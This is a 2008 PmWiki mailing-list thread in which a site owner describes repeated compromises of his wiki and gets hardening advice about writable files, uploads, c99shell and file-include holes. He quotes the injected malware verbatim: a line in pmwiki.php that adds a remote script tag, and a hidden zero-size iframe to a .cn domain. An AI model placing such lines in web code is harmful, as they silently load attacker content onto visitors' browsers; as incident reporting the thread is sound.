- Configuration file is set to allow upload of gif, jpeg, jpg, png, htm and html files. I've had a look in the upload directories - and for the moment I could not find anything suspicious.
- Include markup is not used. The pmWiki.php-file is infected with this line: $HTMLEndFmt = "\n<script src=http://www.mc2n.ru/script.js></script></body>\n</html>"; I don't know how this works, but it seems to write this at the end of many html and asp files at the site. 2008/9/3 Greg T. Grimes <[EMAIL PROTECTED]>: > > Are these files writeable by the web server? Do you allow uploads to your > site? Standard security practice says not to allow the web server write > access to any files on your system. This is especially true for your > webpages. If you do allow uploads you might want to check your upload > directory for files that could be used to gain access to your server. > c99shell is an example. Another thing to look for are file include > vulnerabilities. For example, if you take input for a form and then use > that input to include a certain file based on the input this can be used to > launch scripts that aren't even hosted on your server. I'm currently not > aware of any File Include Vulns in pmwiki. Just a quick look at the code > and I don't see any obvious ones. > > On Wed, 3 Sep 2008, Erik Haagensen wrote: > >> Our site has been hacked several times during the last month. >> It has been cleaned and checked by Site Analyzer - all ok. >> After some days we have problems again. >> >> The index.php (and several other files) contains this now: >> >> <?php include('pmwiki.php'); >> <iframe src="http://mixlong.cn/in/"; width=0 height=0 >> frameborder=0></iframe> >> >> >> >> I don't know what more to do to avoid these problems. >> >> -- >> mvh >> Erik Haagensen >> Oslia >> NO-2550 Os i Ă˜sterdalen >> > > -- > Greg T. Grimes > Network Analyst > ITS -- Network Services > Mississippi State University -- mvh Erik Haagensen Oslia NO-2550 Os i Ă˜sterdalen tlf: +47 62497332 / 94430332 www.bokbinding.no www.haagensen.no/erik N62.50439 E11.17562 _______________________________________________ pmwiki-users mailing list [email protected] http://www.pmichaud.com/mailman/listinfo/pmwiki-users
